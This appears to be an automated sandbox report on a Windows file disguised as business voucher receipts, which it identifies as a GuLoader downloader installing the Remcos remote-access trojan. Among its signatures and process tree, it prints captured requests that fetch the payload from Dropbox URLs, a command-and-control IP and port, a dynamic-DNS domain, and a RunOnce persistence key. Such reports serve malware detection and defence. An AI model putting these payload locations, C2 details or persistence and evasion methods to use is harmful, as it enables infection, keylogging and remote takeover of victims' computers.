
Windows Analysis Report
Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe

Overview

General Information

Sample name: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe
Analysis ID: 1637330
MD5: bd77910e1cdead3cdd559950952536e9
SHA1: 69775eb9e64ad8e34158e5d886d3ff517febde39
SHA256: e11a97236afde003d97440b91a471a73f59fcd2c6f40cc4dde9f7ac57e67ee5d
Tags: exe, user-TornadoAV_dev

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious PE digital signature
Creates a thread in another existing process (thread injection)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe (PID: 6996 cmdline: "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe" MD5: BD77910E1CDEAD3CDD559950952536E9)
    • IMCCPHR.exe (PID: 2564 cmdline: "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe" MD5: 69A21227EB75F9100BAFD6CE573A1DC0)
    • IMCCPHR.exe (PID: 5916 cmdline: "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe" MD5: 69A21227EB75F9100BAFD6CE573A1DC0)
    • IMCCPHR.exe (PID: 6868 cmdline: "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe" MD5: 69A21227EB75F9100BAFD6CE573A1DC0)
    • IMCCPHR.exe (PID: 6628 cmdline: "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe" MD5: 69A21227EB75F9100BAFD6CE573A1DC0)
  • Udarter.exe (PID: 3812 cmdline: "C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe" MD5: BD77910E1CDEAD3CDD559950952536E9)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
Yara matches (Source | Rule | Description | Author):
  • C:\Users\user\AppData\Roaming\Atrulx\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  • 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  • 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  • 00000002.00000002.2648233506.0000000006091000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
  • Process Memory Space: IMCCPHR.exe PID: 6628 | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

            System Summary

            Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe, ProcessId: 6628, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Skruplers
            Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
              • 2025-03-13T14:40:17.508480+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 49757 | 103.47.146.161 | 3219 | TCP
              • 2025-03-13T14:40:19.714110+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.12 | 49758 | 178.237.33.50 | 80 | TCP
              • 2025-03-13T14:40:11.222646+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.12 | 49755 | 162.125.66.18 | 443 | TCP


            AV Detection

            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Avira: detected
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe | Avira: detection malicious, Label: TR/AD.NsisInject.udgyk
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe | ReversingLabs: Detection: 18%
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Virustotal: Detection: 23%
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | ReversingLabs: Detection: 18%
            Source: Yara match | File source: 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: IMCCPHR.exe PID: 6628, type: MEMORYSTR
            Source: Yara match | File source: C:\Users\user\AppData\Roaming\Atrulx\logs.dat, type: DROPPED
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknown | HTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.12:49755 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.12:49756 version: TLS 1.2
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Code function: 2_2_00405470 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Code function: 2_2_00405E97 FindFirstFileA,FindClose
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Code function: 2_2_0040264F FindFirstFileA
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe | Code function: 15_2_00405470 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe | Code function: 15_2_00405E97 FindFirstFileA,FindClose
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe | Code function: 15_2_0040264F FindFirstFileA

            Networking

            Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.12:49757 -> 103.47.146.161:3219
            Source: global traffic | TCP traffic: 192.168.2.12:49757 -> 103.47.146.161:3219
            Source: global traffic | HTTP traffic detected:
                GET /json.gp HTTP/1.1
                Host: geoplugin.net
                Cache-Control: no-cache
            Source: Joe Sandbox View | IP Address: 162.125.66.18
            Source: Joe Sandbox View | IP Address: 178.237.33.50
            Source: Joe Sandbox View | ASN Name: AS45671-NET-AUWholesaleServicesProviderAU
            Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.12:49758 -> 178.237.33.50:80
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.12:49755 -> 162.125.66.18:443
            Source: global traffic | HTTP traffic detected:
                GET /scl/fi/0dy2db3sb0nktw61dep7z/GzBWRKH211.bin?rlkey=wnrsfi0kxker6aq6nvrl7cxr1&st=k83hkkdb&dl=1 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                Host: www.dropbox.com
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected:
                GET /cd/0/get/ClyX48MYB0mVuxdHbaWDBGzUQbXf8hr01cGU3kByQMca-WvMkOIru6aYnUrLvJ2xwCLDCkICrDXwShbcmZrCM0ekm1wrG34Kf_9caEux4fxbkSsjRtoJs97XE2cQdiUp3qxinXUhJuF4RWo49_gdteit/file?dl=1 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                Cache-Control: no-cache
                Host: ucc837886400c4962c820c7b7765.dl.dropboxusercontent.com
                Connection: Keep-Alive
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | DNS traffic detected: DNS query: www.dropbox.com
            Source: global traffic | DNS traffic detected: DNS query: ucc837886400c4962c820c7b7765.dl.dropboxusercontent.com
            Source: global traffic | DNS traffic detected: DNS query: msi25.dynnamn.ru
            Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/X
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.000000000800C000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpl
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpz
            Source: Udarter.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe, 00000002.00000002.2647224029.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe, 00000002.00000000.1271688344.0000000000409000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ucc837886400c4962c820c7b7765.dl.dropboxusercontent.com/
            Source: IMCCPHR.exe, 0000000E.00000003.2816825843.0000000007FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ucc837886400c4962c820c7b7765.dl.dropboxusercontent.com/%
            Source: IMCCPHR.exe, 0000000E.00000003.2850621867.0000000007FB1000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ucc837886400c4962c820c7b7765.dl.dropboxusercontent.com/REM
            Source: IMCCPHR.exe, 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ucc837886400c4962c820c7b7765.dl.dropboxusercontent.com/cd/0/get/ClyX48MYB0mVuxdHbaWDBGzUQbXf
            Source: IMCCPHR.exe, 0000000E.00000002.3740304162.0000000007F48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ucc837886400c4962c820c7b7765.dl.dropboxusercontent.com/z
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe | Windows user hook set: 0 keyboard low level C:\Windows\System32\IME\SHARED\IMCCPHR.exe
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Code function: 2_2_00404FDE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

            E-Banking Fraud

            Source: Yara match | File source: 0000000E.00000002.3740304162.0000000007FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000003.2901823548.0000000007FAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: IMCCPHR.exe PID: 6628, type: MEMORYSTR
            Source: Yara match | File source: C:\Users\user\AppData\Roaming\Atrulx\logs.dat, type: DROPPED

            System Summary

            Source: initial sample | Static PE information: Filename: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe | Process Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Process Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Code function: 2_2_0040310B EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,CopyFileA,LdrInitializeThunk,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe | Code function: 15_2_0040310B EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Code function: 2_2_0040481D
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Code function: 2_2_00406A95
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Code function: 2_2_004062BE
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe | Code function: 15_2_0040481D
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe | Code function: 15_2_00406A95
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe | Code function: 15_2_004062BE
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsaFB2F.tmp\System.dll B9631423A50C666FAF2CC6901C5A8D6EB2FECD306FDD2524256B7E2E37B251C2
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsf7576.tmp\System.dll B9631423A50C666FAF2CC6901C5A8D6EB2FECD306FDD2524256B7E2E37B251C2
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Static PE information: invalid certificate
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@10/16@4/4
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_004042E1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,2_2_004042E1
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeCode function: 2_2_00402036 CoCreateInstance,MultiByteToWideChar,2_2_00402036
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile created: C:\Program Files (x86)\Common Files\airsicknessesJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile created: C:\Users\user\Persistent131Jump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeMutant created: \Sessions\1\BaseNamedObjects\Rintrulux38-8H41NM
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile created: C:\Users\user\AppData\Local\Temp\nslEE6D.tmpJump to behavior
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeVirustotal: Detection: 23%
            Source: Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeReversingLabs: Detection: 18%
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeFile read: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe "C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exe"
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeProcess created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Unintervolved\Udarter.exeSection loaded: kernel.appcore.dllJump to behavior
